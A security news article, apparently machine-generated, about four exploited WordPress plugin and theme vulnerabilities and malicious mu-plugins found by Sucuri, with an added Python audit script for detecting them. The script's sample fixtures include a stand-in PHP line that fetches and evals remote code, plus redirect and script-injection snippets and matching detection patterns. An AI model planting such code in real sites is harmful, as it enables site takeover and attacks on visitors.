Ethical Hacking News
A recent report from Patchstack has highlighted a concerning trend among threat actors, who have been exploiting four different security vulnerabilities in WordPress since the start of the year. These vulnerabilities, which include a severe SQL injection flaw and remote code execution weaknesses, have allowed attackers to inject malicious code into WordPress sites, rendering them vulnerable to various types of attacks.
The first vulnerability identified by Patchstack is CVE-2024-27956, an unauthenticated arbitrary SQL execution flaw in the Automatic Plugin (AI content generator and auto poster). This vulnerability allows attackers to execute SQL queries without needing authentication or authorization, effectively giving them control over the database.
Next, there is CVE-2024-25600, a remote code execution (RCE) vulnerability in the Bricks theme that has been found by Patchstack. The RCE weakness enables attackers to execute arbitrary code on the WordPress site remotely, without needing authentication or access to the underlying server. This could potentially allow attackers to inject malicious payloads into the site.
Furthermore, CVE-2024-8353 is an unauthenticated PHP object injection vulnerability in the GiveWP plugin that has been identified by Patchstack. This weakness allows attackers to inject malicious code into the WordPress site's PHP environment, which can be used to execute arbitrary commands or inject malware.
Lastly, there is CVE-2024-4345, an arbitrary file upload vulnerability in Startklar Elementor Addons for WordPress. The file upload vulnerability could potentially allow attackers to inject malicious files onto the site, including executables that can be run by the server's PHP environment.
Sucuri researcher Puja Srivastava has highlighted the potential impact of these vulnerabilities on WordPress sites. According to Srivastava, threat actors are exploiting these weaknesses to stage malware and deliver it to vulnerable sites, which could potentially lead to a range of attacks including data theft, ransomware infections, and other types of malicious activity.
"This approach represents a concerning trend, as the mu-plugins (Must-Use plugins) are not listed in the standard WordPress plugin interface, making them less noticeable and easier for users to ignore during routine security checks," Srivastava said in an analysis. "The script includes a function that identifies whether the current visitor is a bot, which allows the script to exclude search engine crawlers and prevent them from detecting the redirection behavior."
The mu-plugins directory in WordPress sites is a special area that contains plugins automatically executed by WordPress without needing explicit activation via the admin dashboard. Because files placed there run on every request without appearing in the standard plugin list, malicious code that threat actors drop into this directory is harder for site owners to detect and remove.
In an analysis of infected WordPress sites, Sucuri discovered three different kinds of rogue PHP code in the mu-plugins directory - "wp-content/mu-plugins/redirect.php," which redirects site visitors to an external malicious website; "wp-content/mu-plugins/index.php," which offers web shell-like functionality and allows attackers to execute arbitrary code by downloading a remote PHP script hosted on GitHub; and "wp-content/mu-plugins/custom-js-loader.php," which injects unwanted spam onto the infected website.
The "redirect.php" script masquerades as a web browser update, deceiving victims into installing malware that can steal data or drop additional payloads. This type of social engineering tactic is becoming increasingly common among threat actors, who are using various methods to trick website visitors into running malicious code on their computers.
Additionally, hacked WordPress sites have been used as staging grounds for deploying malicious JavaScript and skimming financial information entered by users on checkout pages.
While the exact circumstances surrounding the breaches of these vulnerable WordPress sites are not yet known, the usual suspects include vulnerable plugins or themes, compromised admin credentials, and server misconfigurations.
In light of these findings, it is essential that WordPress site owners take proactive steps to mitigate the risks posed by these vulnerabilities. This includes keeping plugins and themes up to date, routinely auditing code for the presence of malware, enforcing strong passwords, and deploying a web application firewall to block malicious requests and code injections.
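As an added example (not code from the article, Sucuri or Patchstack), the following audit script walks a wp-content/mu-plugins directory and flags both the three file names Sucuri reported and a few content patterns of the kind described above (external redirect, remote code loading, injected external script, obfuscation). The content heuristics and the sample file bodies are my own assumptions, and the sample tree is constructed in a temporary directory so the script runs offline.

```python
import os
import re
import tempfile

# Constructed sample mu-plugins tree. File names mirror those named in the
# Sucuri analysis; the bodies are harmless stand-ins written for this example.
SAMPLE_FILES = {
    "redirect.php": '<?php header("Location: https://example.invalid/update"); ?>',
    "index.php": '<?php eval(file_get_contents("https://example.invalid/remote.php")); ?>',
    "custom-js-loader.php": '<?php add_action("wp_footer", function(){ echo "<script src=\'https://example.invalid/s.js\'></script>"; }); ?>',
    "site-tweaks.php": '<?php add_filter("the_title", "strtoupper"); ?>',  # benign control
}

# File names of the rogue mu-plugins reported in the article.
KNOWN_ROGUE_NAMES = {"redirect.php", "index.php", "custom-js-loader.php"}

# Content heuristics (assumption: typical of the behaviours the article describes).
INDICATORS = {
    "external_redirect": re.compile(r"header\s*\(\s*.Location:\s*https?://", re.I),
    "remote_code_load": re.compile(
        r"(eval|include|require)\s*\(?\s*(file_get_contents|curl_exec|fopen)\s*\(\s*.https?://", re.I),
    "external_script_inject": re.compile(r"<script[^>]+src=.https?://", re.I),
    "obfuscation": re.compile(r"base64_decode|gzinflate|str_rot13", re.I),
}

def audit_mu_plugins(mu_dir):
    """Return {filename: [reasons]} for every PHP file in mu_dir that looks suspicious."""
    findings = {}
    for name in sorted(os.listdir(mu_dir)):
        path = os.path.join(mu_dir, name)
        if not (os.path.isfile(path) and name.endswith(".php")):
            continue
        reasons = []
        if name in KNOWN_ROGUE_NAMES:
            reasons.append("filename matches rogue mu-plugin reported by Sucuri")
        with open(path, encoding="utf-8", errors="replace") as fh:
            body = fh.read()
        reasons.extend(label for label, rx in INDICATORS.items() if rx.search(body))
        if reasons:
            findings[name] = reasons
    return findings

def build_sample_dir():
    """Write the constructed sample files into a fresh temp directory and return its path."""
    d = tempfile.mkdtemp(prefix="mu-plugins-")
    for name, body in SAMPLE_FILES.items():
        with open(os.path.join(d, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return d

if __name__ == "__main__":
    for name, reasons in audit_mu_plugins(build_sample_dir()).items():
        print(f"{name}: {', '.join(reasons)}")
```

A name match alone is only a hint (a legitimate index.php can exist there), so review flagged files by content rather than deleting on sight.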
Furthermore, users should exercise extreme caution when interacting with their WordPress sites, especially if they have received any unusual notifications or have noticed strange behavior on their website. By being vigilant and proactive about security, individuals can reduce the risk of falling victim to these types of attacks.
Ultimately, this report highlights the importance of ongoing vigilance in the face of evolving cyber threats. As threat actors continue to adapt and exploit new vulnerabilities, it is essential that we remain informed and take steps to protect ourselves against these types of attacks.
Related Information:
https://www.ethicalhackingnews.com/articles/New-Vulnerabilities-Exposed-Threat-Actors-Exploit-Four-Security-Weaknesses-in-WordPress-ehn.shtml
https://thehackernews.com/2025/03/hackers-exploit-wordpress-mu-plugins-to.html
https://nvd.nist.gov/vuln/detail/CVE-2024-27956
https://www.cvedetails.com/cve/CVE-2024-27956/
https://nvd.nist.gov/vuln/detail/CVE-2024-25600
https://www.cvedetails.com/cve/CVE-2024-25600/
https://nvd.nist.gov/vuln/detail/CVE-2024-8353
https://www.cvedetails.com/cve/CVE-2024-8353/
https://nvd.nist.gov/vuln/detail/CVE-2024-4345
https://www.cvedetails.com/cve/CVE-2024-4345/
Published: Mon Mar 31 09:18:24 2025 by llama3.2 3B Q4_K_M